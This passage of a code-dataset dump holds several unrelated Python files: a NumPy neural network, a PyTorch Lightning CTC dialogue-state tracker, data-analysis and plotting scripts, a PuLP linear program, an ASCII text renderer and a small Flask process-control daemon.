r[(i)/2]+r[(j)/2]\n out2 = out2 + (rij**2 - dist) * exp((c/rij**2)*(rij**2-dist));\n\n out = (out1 + out2) * damp\n return out\n","sub_path":"acp/fkt.py","file_name":"fkt.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"280088479","text":"import numpy as np\n\n\nclass NeuralNetwork:\n
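# a minimal fully-connected network trained with plain backpropagation (sigmoid activations throughout);\n# 'layers' gives the node count per layer, e.g. [2, 2, 1], and 'alpha' is the learning rate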
__init__(self, layers, alpha=0.1):\n        # initialize the list of weights matrices, then store the\n        # network architecture and learning rate\n        self.W = []\n        self.layers = layers\n        self.alpha = alpha\n        for i in np.arange(0, len(layers) - 2):\n            # randomly initialize a weight matrix connecting the\n            # number of nodes in each respective layer together,\n            # adding an extra node for the bias\n            w = np.random.randn(layers[i] + 1, layers[i + 1] + 1)\n            self.W.append(w / np.sqrt(layers[i]))\n        w = np.random.randn(layers[-2] + 1, layers[-1])\n        self.W.append(w / np.sqrt(layers[-2]))\n\n    def sigmoid_deriv(self, x):\n\n        # compute the derivative of the sigmoid function ASSUMING\n        # that ‘x‘ has already been passed through the ‘sigmoid‘\n        # function\n        return x * (1 - x)\n\n    def sigmoid(self, x):\n\n        # compute and return the sigmoid activation value for a\n        # given input value\n        return 1.0 / (1 + np.exp(-x))\n\n    def __repr__(self):\n\n        # construct and return a string that represents the network\n        # architecture\n        return \"NeuralNetwork: {}\".format(\n            \"-\".join(str(l) for l in self.layers))\n\n    def fit_partial(self, x, y):\n\n        # construct our list of output activations for each layer\n        # as our data point flows through the network; the first\n        # activation is a special case -- it’s just the input\n        # feature vector itself\n        A = [np.atleast_2d(x)]\n        for layer in np.arange(0, len(self.W)):\n            net = A[layer].dot(self.W[layer])\n            out = self.sigmoid(net)\n            A.append(out)\n        error = A[-1] - y\n        D = [error * self.sigmoid_deriv(A[-1])]\n        for layer in np.arange(len(A) - 2, 0, -1):\n            # the delta for the current layer is equal to the delta\n            # of the *previous layer* dotted with the weight matrix\n            # of the current layer, followed by multiplying the delta\n            # by the derivative of the nonlinear activation function\n            # for the activations of the current layer\n            delta = D[-1].dot(self.W[layer].T)\n            delta = delta * self.sigmoid_deriv(A[layer])\n            D.append(delta)\n        D = D[::-1]\n        for layer in np.arange(0, len(self.W)):\n            self.W[layer] += -self.alpha * A[layer].T.dot(D[layer])\n\n    def predict(self, X, addBias=True):\n        p = np.atleast_2d(X)\n        if addBias:\n            p = np.c_[p, np.ones((p.shape[0]))]\n\n        for layer in np.arange(0, len(self.W)):\n            # propagate through the weight matrix of the current layer\n            p = self.sigmoid(np.dot(p, self.W[layer]))\n        return p\n\n    def calculate_loss(self, X, targets):\n\n        targets = np.atleast_2d(targets)\n        predictions = self.predict(X, addBias=False)\n        loss = 0.5 * np.sum((predictions - targets) ** 2)\n\n        return loss\n\n    def fit(self, X, y, epochs=1000, displayUpdate=100):\n\n        # insert a column of 1’s as the last entry in the feature\n        # matrix -- this little trick allows us to treat the bias\n        # as a trainable parameter within the weight matrix\n        X = np.c_[X, np.ones((X.shape[0]))]\n        # loop over the desired number of epochs\n        for epoch in np.arange(0, epochs):\n            # loop over each individual data point and train\n            # our network on it\n            for (x, target) in zip(X, y):\n                self.fit_partial(x, target)\n\n            if epoch == 0 or (epoch + 1) % displayUpdate == 0:\n                loss = self.calculate_loss(X, y)\n                print(\"[INFO] epoch={}, loss={:.7f}\".format(\n                    epoch + 1, loss))\n
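# a minimal usage sketch (added comment, not part of the original file):\n# the classic XOR sanity check for this network\n#   nn = NeuralNetwork([2, 2, 1], alpha=0.5)\n#   X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])\n#   y = np.array([[0], [1], [1], [0]])\n#   nn.fit(X, y, epochs=20000)\n#   print(nn.predict(X))  # predictions should approach 0, 1, 1, 0\n","sub_path":"pyimagesearch/nn/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"80607166","text":"#create function/ define func\n# i, j are variables/ parameters\n\ndef iiec(*i):\n\tm = 0\n\tfor j in i:\n\t\tm = j + m\n\treturn m\t\n\n\n# to run / calling a func\n\nu = 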
iiec(2,5,8,4,1)\nprint(u)\n\nd = iiec(3,2)\nprint(d)","sub_path":"f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"495882574","text":"from argparse import Namespace, ArgumentParser\nfrom typing import Dict, List\nfrom pathlib import Path\nfrom itertools import chain\n\nimport torch\nfrom torch import nn\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import LightningModule\nfrom ipdb import set_trace\n\nfrom src.preprocess import preprocess\nfrom src.tokenizer import get_tokenizer, WordLevelTokenizer\nfrom src.dataset import MultiWozDSTDataset\nfrom src.positional_embedding import PositionalEncoding\n\n\ndef ctc_collapse(seq: List, padding) -> List:\n    # standard CTC decoding: collapse repeated labels, then drop the\n    # padding/blank token\n    collapse = []\n    prev = None\n    for x in seq:\n        if x == prev or x == padding:\n            pass\n        else:\n            collapse.append(x)\n        # prev must be updated on every step (including blanks) so that a\n        # blank separates repeats, e.g. ctc_collapse([1, 0, 1], 0) -> [1, 1]\n        prev = x\n    return collapse\n\n\nclass NATODS(LightningModule):\n    @staticmethod\n    def add_model_specific_args(parent_parser):\n        parser = ArgumentParser(parents=[parent_parser])\n\n        # Embedding / Vocab\n        parser.add_argument('--embedding_dim', default=256)\n\n        parser.add_argument('--dropout', default=0.1)\n\n        # Transformer Encoder\n        parser.add_argument('--hidden_dim', default=256)\n        parser.add_argument('--num_heads', default=4)\n        parser.add_argument('--num_passes', default=2)\n\n        # optimizer\n        parser.add_argument('--lr', default=3e-4, type=float)\n        parser.add_argument('--weight_decay', default=0, type=float)\n\n        # data\n        parser.add_argument('--input_multiplier', default=4, type=int,\n                            help='# times to repeat input in order to make input longer than output')\n\n        # dataset\n        parser.add_argument('--train_path',\n                            default='./.data/MultiWoz_2.1_NADST_Version/data2.1/nadst_train_dials.json')\n        parser.add_argument('--val_path',\n                            default='./.data/MultiWoz_2.1_NADST_Version/data2.1/nadst_dev_dials.json')\n        parser.add_argument('--test_path',\n                            default='./.data/MultiWoz_2.1_NADST_Version/data2.1/nadst_test_dials.json')\n        parser.add_argument('--ontology_path',\n                            default='./.data/MultiWoz_2.1_NADST_Version/data2.1/multi-woz/MULTIWOZ2.1/ontology.json')\n\n        # tokenizer\n        parser.add_argument('--tokenizer_path',\n                            default='./tokenizer/multiwoz2.1-vocab.json')\n\n        # dataloader\n        parser.add_argument('--batch_size', default=128, type=int)\n\n        return parser\n\n    def __init__(self, hparams: Namespace):\n        super().__init__()\n        self.hparams = hparams\n\n        self.criterion = nn.CTCLoss()\n\n        if Path(self.hparams.tokenizer_path).exists():\n            self.tokenizer = WordLevelTokenizer(self.hparams.tokenizer_path)\n        else:\n            train_turns = preprocess(self.hparams.train_path,\n                                     self.hparams.ontology_path)\n            self.tokenizer = get_tokenizer(train_turns,\n                                           self.hparams.tokenizer_path)\n\n        # embedding\n        self.embedding = nn.Embedding(self.tokenizer.get_vocab_size(),\n                                      self.hparams.embedding_dim)\n        self.pos_embedding = PositionalEncoding(\n            d_model=self.hparams.embedding_dim,\n            dropout=self.hparams.dropout)\n\n        # value decoder\n        self.value_decoder = nn.ModuleList([\n            nn.MultiheadAttention(\n                embed_dim=self.hparams.hidden_dim,\n                num_heads=self.hparams.num_heads,\n                dropout=self.hparams.dropout)\n            for _ in range(3)])\n        self.vocab_proj = nn.Linear(self.hparams.hidden_dim,\n                                    self.tokenizer.get_vocab_size())\n\n    def forward(self,\n                batch: Dict[str, torch.Tensor]\n                ) -> torch.Tensor:\n        # history\n        delex_history_embed = self.pos_embedding(\n            self.embedding(batch['ids_delex_history']))\n        history_embed = self.pos_embedding(\n            
self.embedding(batch['ids_history']))\n\n        # value decoder's input\n        fert_domain_embed = self.embedding(batch['ids_input_domain'])\n        fert_slot_embed = self.embedding(batch['ids_input_slot'])\n        fert_token_embed = self.pos_embedding(\n            fert_domain_embed + fert_slot_embed)\n\n        # value decoding\n        z_fert_ds = self.forward_attentions(self.value_decoder,\n                                            fert_token_embed,\n                                            delex_history_embed,\n                                            history_embed)\n        value_logit = self.vocab_proj(z_fert_ds)\n        return value_logit\n\n    def forward_attentions(self, decoders, token_embed,\n                           delex_history_embed, history_embed\n                           ) -> torch.Tensor:\n        assert len(decoders) == 3\n        assert self.hparams.num_passes > 0\n        z_ds_0 = token_embed\n        for _ in range(self.hparams.num_passes):\n            z_ds_1, _ = decoders[0].forward(\n                query=z_ds_0, key=z_ds_0, value=z_ds_0,\n            )\n            z_ds_2, _ = decoders[1].forward(\n                query=z_ds_1, key=delex_history_embed, value=delex_history_embed,\n            )\n            z_ds_3, _ = decoders[2].forward(\n                query=z_ds_2, key=history_embed, value=history_embed,\n            )\n            z_ds_0 = z_ds_3 + z_ds_0\n        return z_ds_0\n\n    def calculate_loss(self,\n                       logits: torch.Tensor,\n                       batch: Dict\n                       ) -> torch.Tensor:\n        log_probs = logits.log_softmax(-1)\n        input_lengths = torch.LongTensor(\n            [log_probs.size(0)] * log_probs.size(1))\n        targets = batch['value'].T\n        target_lengths = torch.sum(targets != self.train_dataset.ignore_idx, 1)\n        assert all(input_lengths[0] >= l for l in target_lengths), target_lengths\n        loss = self.criterion(log_probs, targets,\n                              input_lengths, target_lengths)\n        return loss\n\n    def calculate_metrics(self,\n                          outputs: List[Dict[str, torch.Tensor]],\n                          ) -> Dict[str, float]:\n        metrics = {}\n        pred_idxs = torch.cat([x['preds'] for x in outputs], 1).T\n        preds_str = self.tokenizer.decode_batch(\n            [ctc_collapse(seq, 0) for seq in pred_idxs.tolist()])\n        value_str = list(chain.from_iterable([x['value_str'] for x in outputs]))\n        assert len(value_str) == len(preds_str)\n        metrics['accuracy/joint'] = \\\n            sum(1 if gt == pred else 0\n                for gt, pred in zip(value_str, preds_str)) / len(value_str)\n        return metrics\n\n    def training_step(self, batch, batch_idx):\n        logits = self.forward(batch)\n        loss = self.calculate_loss(logits, batch)\n        return {'loss': loss, 'log': {'loss/train': loss}}\n\n    def validation_step(self, batch, batch_idx):\n        logits = self.forward(batch)\n        loss = self.calculate_loss(logits, batch)\n        return {'loss': loss.cpu(),\n                'preds': logits.cpu().argmax(-1),\n                'value_str': batch['value_str'],\n                }\n\n    def validation_epoch_end(self, outputs, mode='val'):\n        loss = torch.stack([x['loss'] for x in outputs]).mean()\n        metrics = self.calculate_metrics(outputs)\n        log = {\n            **{f\"loss/{mode}\": loss},\n            **{f'metrics/{mode}/{k}': v for k, v in metrics.items()}\n        }\n        return {f'{mode}_loss': loss, 'log': log}\n\n    def test_step(self, *args, **kwargs):\n        return self.validation_step(*args, **kwargs)\n\n    def test_epoch_end(self, *args, **kwargs):\n        return self.validation_epoch_end(*args, **kwargs, mode='test')\n\n    def configure_optimizers(self):\n        optimizer = Adam(\n            self.parameters(),\n            lr=self.hparams.lr,\n            weight_decay=self.hparams.weight_decay,\n        )\n        return optimizer\n\n    def prepare_data(self) -> None:\n        train_turns = preprocess(self.hparams.train_path,\n                                 self.hparams.ontology_path)\n        val_turns = preprocess(self.hparams.val_path,\n                               self.hparams.ontology_path)\n        test_turns = preprocess(self.hparams.test_path,\n                                self.hparams.ontology_path)\n        self.train_dataset = MultiWozDSTDataset(train_turns,\n                                                self.tokenizer,\n                                                self.hparams.input_multiplier)\n        self.val_dataset = 
MultiWozDSTDataset(val_turns,\n self.tokenizer,\n self.hparams.input_multiplier)\n self.test_dataset = MultiWozDSTDataset(test_turns,\n self.tokenizer,\n self.hparams.input_multiplier)\n\n def train_dataloader(self) -> DataLoader:\n return DataLoader(\n self.train_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=True,\n collate_fn=self.train_dataset.collate_fn,\n )\n\n def val_dataloader(self) -> DataLoader:\n return DataLoader(\n self.val_dataset,\n batch_size=self.hparams.batch_size,\n collate_fn=self.val_dataset.collate_fn,\n )\n\n def test_dataloader(self) -> DataLoader:\n return DataLoader(\n self.test_dataset,\n batch_size=self.hparams.batch_size,\n collate_fn=self.test_dataset.collate_fn,\n )\n","sub_path":"src/ctcdst/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":9620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"554088405","text":"\n# def longest_word():\n \n\n# longest_word()\n\nprint('Lets see which word is the longest')\nprint('Heres the list')\nwords = [\n 'mystery',\n 'brother',\n 'aviator',\n 'crocodile',\n 'pearl',\n 'orchard',\n 'crackpot'\n]\nprint(words)\nlongest = max(words, key=len)\nprint('The longest word is:', longest)","sub_path":"exercises/longest_word.py","file_name":"longest_word.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304979172","text":"import re\nimport os\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom mu2e import mu2e_ext_path\nfrom emtracks.plotting import config_plots\n\nconfig_plots()\n\ndef check_dir(dirname):\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n# a few functions to keep code DRY\ndef get_data(df, var, query=None):\n if query is None:\n df_ = df\n else:\n df_ = df.query(query)\n data = df_[var].values\n return data\n\n# reference label\n# label_temp = '{0}\\n' + r'$\\mu = {1:.3E}$'+ '\\n' + 'std' + r'$= {2:.3E}$' + '\\n' + 'Integral: {3}\\n' + 'Underflow: {4}\\nOverflow: {5}'\n\ndef get_label(name, data, bins):\n if type(bins) == int:\n over=0\n under=0\n # sci\n # mean = f'{np.mean(data):.3E}'\n # std = f'{np.std(data, ddof=1):.3E}'\n # label = f'mean: {mean:>15}' + '\\n' + f'stddev: {std:>15}' + '\\n' + f'Integral: {len(data):>17}\\nUnderflow: {under:>16}\\nOverflow: {over:>16}'\n # float\n # mean = f'{np.mean(data):.1f}'\n # std = f'{np.std(data, ddof=1):.1f}'\n mean = f'{np.mean(data):.2f}'\n std = f'{np.std(data, ddof=1):.2f}'\n label = f'mean: {mean:>9}' + '\\n' + f'stddev: {std:>8}' + '\\n' + f'Integral: {len(data):>5}\\nUnder: {under:>11}\\nOver: {over:>13}'\n else:\n over = (data > np.max(bins)).sum()\n under = (data < np.min(bins)).sum()\n data = data[(data <= np.max(bins)) & (data >= np.min(bins))]\n # sci\n # mean = f'{np.mean(data):.3E}'\n # std = f'{np.std(data, ddof=1):.3E}'\n # label = f'mean: {mean:>15}' + '\\n' + f'stddev: {std:>15}' + '\\n' + f'Integral: {len(data)-over-under:>17}\\nUnderflow: {under:>16}\\nOverflow: {over:>16}'\n # float\n # mean = f'{np.mean(data):.1f}'\n # std = f'{np.std(data, ddof=1):.1f}'\n mean = f'{np.mean(data):.2f}'\n std = f'{np.std(data, ddof=1):.2f}'\n label = f'mean: {mean:>9}' + '\\n' + f'stddev: {std:>8}' + '\\n' + f'Integral: {len(data)-over-under:>5}\\nUnder: {under:>11}\\nOver: {over:>13}'\n # label = f'{name}\\n' + rf'$\\mu: {np.mean(tand):.3E}$' + '\\n' + rf'$\\sigma: {np.std(tand):.3E}$' + '\\n' + f'Integral: 
{len(tand)}\\nUnderflow: {under}\\nOverflow: {over}'\n # std = f'{np.std(data):.3E}'\n # n = 15\n return label\n\ndef make_plot_hist(df, name='Mau9 70%', var='tand_Mau9_70', xl=r'$\\tan(\\mathrm{dip})$', query=None, queryn='full', bins=20, legendloc='upper right', plotdir=None, Bname=\"\", fig=None, ax=None, save=True):\n data = get_data(df, var, query)\n if ax is None:\n fig, ax = plt.subplots()\n sname = re.search('_(.*)_', Bname).group(1).replace('_','\\ ')\n # sname = Bname[:-9] # re.search('_(.*)_', Bname).group(1)\n # sname = \"\"# Bname[:-9] # re.search('_(.*)_', Bname).group(1)\n ax.hist(data, bins=bins, histtype='step', linewidth=1.5, label=rf'$\\bf{{{sname}}}$'+'\\n'+get_label(None, data, bins))\n # ax.hist(data, bins=bins, histtype='step', linewidth=1.5, label=get_label(None, data, bins))\n ax.set_ylabel('Events')\n ax.set_xlabel(xl)\n if query is None:\n plt.title(Bname)\n else:\n plt.title(Bname+'\\n'+queryn)\n plt.legend(loc=legendloc, fontsize=14)\n # plt.xlim([-1.,1.]) # MeV\n # plt.xlim([-1000.,1000.]) # keV\n if save:\n h = ''\n # h = '_huber'\n fig.savefig(plotdir+Bname+h+'.pdf')\n fig.savefig(plotdir+Bname+h+'.png')\n return fig, ax\n\nif __name__=='__main__':\n # check plot output directory and create if doesn't exist\n #######\n #B_dir = 'cartesian_test' # done\n # B_dir = 'default' # done\n B_dir = 'k2_test' # done\n # B_dir = 'delta_Z_tests' # done\n # B_dir = 'hp_bias' # done\n # B_dir = 'ensemble_random_scale_factor' # done\n #######\n pdir = mu2e_ext_path + 'pickles/Bfit_CE_reco/' + B_dir + '/'\n # plotdir = mu2e_ext_path + 'plots/html/deltaP/' + B_dir + '/'\n plotdir = mu2e_ext_path + 'plots/html/deltaP/' + B_dir + '/single/'\n check_dir(plotdir)\n\n # get files in pickle directory\n files = sorted(os.listdir(pdir))\n # files_run = [i for i in files if i != \"Mau13_sparserz_huber_deltaP.p\"]\n # files_run = [i for i in files if i != \"Mau13_sparserz_deltaP.p\"]\n files_run = files\n # print(files_run)\n\n # xl = r'$p_{\\mathrm{MC}} -p_{\\mathrm{fit}}$ [keV]'\n xl = 'Momentum Shift [keV]'\n\n fig = None; ax = None\n for f in files_run:\n fig = None; ax = None\n df = pd.read_pickle(pdir+f)\n # make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=20, legendloc='best', plotdir=plotdir, Bname=f[:-2])\n # UNITS keV\n df.eval('deltaP = deltaP * 1000', inplace=True)\n # fig, ax = make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=np.linspace(-1000,1000,201), legendloc='upper left', plotdir=plotdir, Bname=f[:-2], fig=fig, ax=ax)\n # fig, ax = make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=np.linspace(-50,50,51), legendloc='upper left', plotdir=plotdir, Bname=f[:-2], fig=fig, ax=ax)\n fig, ax = make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=20, legendloc='upper left', plotdir=plotdir, Bname=f[:-2], fig=fig, ax=ax, save=True)\n # ALTERATION FOR MSC SEMINAR\n ax.plot([0., 0.], [0., 150.], 'r--')\n ax.set_xlim([-100, 100])\n ax.set_ylim([0, 145])\n fig.savefig(f'/home/ckampa/data/plots/html/deltaP/MSC_June2023/{B_dir}_{f}_wide.pdf')\n fig.savefig(f'/home/ckampa/data/plots/html/deltaP/MSC_June2023/{B_dir}_{f}_wide.png')\n # plt.show()\n","sub_path":"scripts/FieldFitting/deltaP_Bfit_plots.py","file_name":"deltaP_Bfit_plots.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11414853","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import 
linear_model\nimport math\nfrom sklearn.preprocessing import OneHotEncoder\ndf_schema = pd.read_csv('survey_results_schema.csv')\ndf_survey = pd.read_csv('survey_results_public.csv',\n usecols=['Respondent','YearsCode','Age1stCode','WorkWeekHrs','CodeRevHrs','Age'],\n index_col='Respondent')\ndf_survey.head(20)\ndf_survey.shape\ndf_survey.dropna(inplace=True)\ndf_survey.shape\ndf_survey['CodeRevHrs'] = df_survey['CodeRevHrs'].astype('int64')\ndf_survey.replace(to_replace='Younger than 5 years', value='4', inplace=True)\ndf_survey.replace(to_replace='Older than 85', value='86', inplace=True)\ndf_survey.replace(to_replace={'Less than 1 year': '0',\n 'More than 50 years': '51'},\n inplace=True)\ndf_survey = df_survey.astype('int64', copy=False)\nplt.plot(df_survey['Age'], df_survey['YearsCode'], 'ro', markersize=0.3)\nplt.xlabel('Age')\nplt.ylabel('YearsCode')\nplt.show()\nplt.plot(df_survey['Age'], df_survey['Age1stCode'], 'ro', markersize=0.3)\nplt.xlabel('Age')\nplt.ylabel('Age1stCode')\nplt.show()\nplt.plot(df_survey['Age1stCode'], df_survey['YearsCode'], 'ro', markersize=0.3)\nplt.xlabel('Age1stCode')\nplt.ylabel('YearsCode')\nplt.show()\n#x1 = Age\n#x2 = Age1stCode\n#y = YearsCode\ndf_survey ['CodeRev'] = pd.read_csv('survey_results_public.csv',\n usecols=['CodeRev'])\ndf_survey.replace(to_replace='Yes, because I see value in code review', value='Yes', inplace=True)\ndf_survey.replace(to_replace='Yes, because I was told to do so', value='Yes', inplace=True)\nCodeRev = df_survey['CodeRev']\nfor index, category in CodeRev.items():\n if (not isinstance(category, str) and math.isnan(category)):\n CodeRev[index] = 0\ndf_survey['CodeRev'] = CodeRev\ndf_survey.replace(to_replace='Yes', value='1', inplace=True)\ndf_survey.replace(to_replace='No', value='0', inplace=True)\ndf_survey ['Student'] = pd.read_csv('survey_results_public.csv',\n usecols=['Student'])\nX = df_survey['Student']\nX_new = []\nunique_categories = {}\ncurrent_index = 0\nfor index, value in X.items():\n category = value\n if (not isinstance(category, str) and math.isnan(category)):\n category = 'No answer'\n\n if (category not in unique_categories):\n current_index += 1\n unique_categories[category] = current_index\n X_new.append([current_index, category])\n X[index] = unique_categories[category]\n\nohe = OneHotEncoder(categories='auto')\nstudents_categories = ohe.fit_transform(X_new).toarray()\ndf_survey['CodeRev'] = df_survey['CodeRev'].astype('int64')\ndf_survey['Student'] = X.astype('int64')\ndf_survey_clr = df_survey[['YearsCode','Age1stCode','Age','CodeRev','Student']]\nQ1 = df_survey_clr.quantile(0.25)\nQ3 = df_survey_clr.quantile(0.75)\nIQR = Q3 - Q1\ndf_survey_clr_q = df_survey_clr[~((df_survey_clr < (Q1 - 1.5 * IQR)) | (df_survey_clr > (Q3 + 1.5 * IQR))).any(axis=1)]\ndf_survey_clr_sd = df_survey_clr[np.abs(df_survey_clr - df_survey_clr.mean()) <= 3*df_survey_clr.std()]\ndf_survey_clr_sd.isna().sum()\ndf_survey_clr_sd = df_survey_clr_sd.dropna()\ndf_survey_clr_m = df_survey_clr[df_survey_clr.YearsCode < 40]\nx = df_survey_clr['YearsCode']\nplt.hist(x, bins=100)\nplt.show();\ndf_survey_clr_row = df_survey_clr[df_survey_clr.YearsCode > 40].index\ndf_survey_clr_fin = df_survey_clr.drop(df_survey_clr_row, axis=0)\nprint(df_survey_clr.corr())\nprint(df_survey_clr_fin.corr())\nsns.boxplot(y='YearsCode', data=df_survey_clr_fin)\nplt.show();\nreg4_1 = linear_model.LinearRegression()\nreg4_1_r = reg4_1.fit(df_survey_clr_fin[['Age']], df_survey_clr_fin['YearsCode'])\nreg4_1_y_p = reg4_1.predict([[60]])\nreg4_2 = 
linear_model.LinearRegression()\nreg4_2_r = reg4_2.fit(df_survey_clr_fin[['Age','Age1stCode']], df_survey_clr_fin['YearsCode'])\nreg4_2_y_p = reg4_2.predict(df_survey_clr_fin[['Age','Age1stCode']])\nreg4_3 = linear_model.LinearRegression()\nreg4_3_y = reg4_3.fit(df_survey_clr_fin[['Age','Age1stCode','CodeRev','Student']],df_survey_clr_fin['YearsCode'])\nreg4_3_y_p = reg4_3.predict(df_survey_clr_fin[['Age','Age1stCode','CodeRev','Student']])\n\n","sub_path":"Zestaw_zadan2.py","file_name":"Zestaw_zadan2.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"192835652","text":"import pulp\nfrom pulp import * \n\n# declare your variables\nx1 = LpVariable(\"x1\",lowBound=0,cat='Integer') \nx2 = LpVariable(\"x2\",lowBound=0,cat='Integer') \nx3 = LpVariable(\"x3\",lowBound=0,cat='Integer') \n\n# defines the problem\nprob = LpProblem(\"problem\", LpMaximize)\n\n# defines the constraints\nprob += x1 + x2 + x3 <= 99 #less than 100 pages\nprob += x3 - x2 >= 5 #environ. at least 5 more than military\nprob += x1 - x2 >= 5 #economy at least 5 more than military\n#prob += x2 >= 3\n\n# defines the objective function to maximize\n# impact function; pulp treats every bare expression added with += as THE\n# objective (a later one overwrites an earlier one), so all three terms\n# must go in as a single expression\nprob += 5*x1 + 2*x2 + 4*x3\n\n# solve the problem\nstatus = prob.solve(GLPK(msg=0))\nLpStatus[status]\n\nvalue(x1)\nvalue(x2)\nvalue(x3)\n\n# expected optimum (worked by hand): x1=94, x2=0, x3=5, objective 490\nprint(prob)\nprint(x1.varValue)\nprint(x2.varValue)\nprint(x3.varValue)\n\n","sub_path":"400 - MathModellers/week 5/midterms/q6v2.py","file_name":"q6v2.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"282154236","text":"import Image, ImageFont, ImageDraw\nimport numpy as np\nimport os\n\ndef getText(input, size):\n\tresult = \"\"\n\tfont = ImageFont.truetype('arialbd.ttf', size) #load the font\n\tsize = font.getsize(input) #calc the size of text in pixels\n\timage = Image.new('1', size, 1) #create a b/w image\n\tdraw = ImageDraw.Draw(image)\n\tdraw.text((0, 0), input, font=font) #render the text to the bitmap\n\tfor rownum in range(size[1]):\n\t\t# scan the bitmap: print ' ' for black pixel and print '#' for white one\n\t\tline = []\n\t\tfor colnum in range(size[0]-1):\n\t\t\tif image.getpixel((colnum, rownum)):\n\t\t\t\tline.append(' '),\n\t\t\telse:\n\t\t\t\tline.append('#'),\n\t\tcurrentLine = ''.join(line)\n\t\tfor ele in currentLine:\n\t\t\tif ele == \"#\":\n\t\t\t\tif rownum != size[1] - 1:\n\t\t\t\t\tresult += currentLine + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\tresult += currentLine\n\t\t\t\tbreak\n\treturn result\n\nnewX = []\nnewY = []\ntext = getText(\"Hello World!\",80)\nlineCounter = len(text.split('\\n'))\nfor line in text.split('\\n'):\n\teleCounter = 0\n\tfor ele in line:\n\t\tif ele == \"#\":\n\t\t\tnewX.append(eleCounter)\n\t\t\tnewY.append(lineCounter)\n\t\teleCounter += 1\n\tlineCounter -= 1\ndata = np.append(np.array(newX), np.array(newY)).reshape(2,len(newX)).transpose()\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndataAsText = \"\"\nfor line in data:\n\tdataAsText += str(line[0]) + \",\" + str(line[1]) + \",0\\n\"\nwith open(os.path.join(dir_path, \"..\",\"..\", \"data\", \"testData.txt\"),'w') as file:\n\tfile.write(dataAsText)","sub_path":"mllib/basics/helloWorldGenerator.py","file_name":"helloWorldGenerator.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"113704568","text":"from flask 
import Flask, escape, request, url_for, send_file\nimport logging\nimport subprocess\nimport os\nimport signal\n\napp = Flask(__name__)\n\nshell_cmd = 'python3 main.py'\np = subprocess.Popen(shell_cmd, shell=True)\n\n\"\"\"\nstatus() return code:\n0 - running\n1 - normal exit\n2 - exit on error\n3 - killed by signal\n\"\"\"\n\n\n@app.route('/status')\ndef status():\n    if p.poll() is None:\n        return '0'\n    elif p.poll() == 0:\n        return '1'\n    elif p.poll() > 0:\n        return '2'\n    return '3'\n\n\n\"\"\"\npid() returns subprocess (repo)'s process id\n\"\"\"\n\n\n@app.route('/pid')\ndef pid():\n    return str(p.pid)\n\n\n\"\"\"\nstop() returns 0, a confirmation.\n\"\"\"\n\n\n@app.route('/stop')\ndef stop():\n    if p.poll() is None:\n        os.kill(p.pid, signal.SIGTERM)\n    return '0'\n\n\n\"\"\"\nrestart() returns 0, a confirmation.\n\"\"\"\n\n\n@app.route('/restart')\ndef restart():\n    global p\n    if p.poll() is None:\n        os.kill(p.pid, signal.SIGTERM)\n    p = subprocess.Popen(shell_cmd, shell=True)\n    return '0'\n\n\n@app.route('/start')\ndef start():\n    global p\n    if p.poll() is None:\n        return '0' #'already running' user doesn't need to know this detail\n    p = subprocess.Popen(shell_cmd, shell=True)\n    return '0'\n\n\n@app.route('/perform_test')\ndef perform_test():\n    return 'not yet implemented'\n\n\ndef main():\n    logging.info('repo daemon has been started')\n\n\nif __name__ == \"__main__\":\n    logging.basicConfig(format='[%(asctime)s]%(levelname)s:%(message)s',\n                        datefmt='%Y-%m-%d %H:%M:%S',\n                        level=logging.INFO)\n    # app.run() blocks until the server exits, so main() only runs afterwards\n    app.run(host='0.0.0.0', port=9876)\n    try:\n        main()\n    except KeyboardInterrupt:\n        pass\n
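# a quick manual check of the endpoints (added comment with a hypothetical\n# session, not part of the original file; port 9876 comes from app.run above):\n#   curl localhost:9876/status   -> '0' while the managed process is running\n#   curl localhost:9876/pid      -> pid of the 'python3 main.py' subprocess\n#   curl localhost:9876/restart  -> '0' after killing and respawning it\n","sub_path":"obsolete/control_center/repo_daemon.py","file_name":"repo_daemon.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
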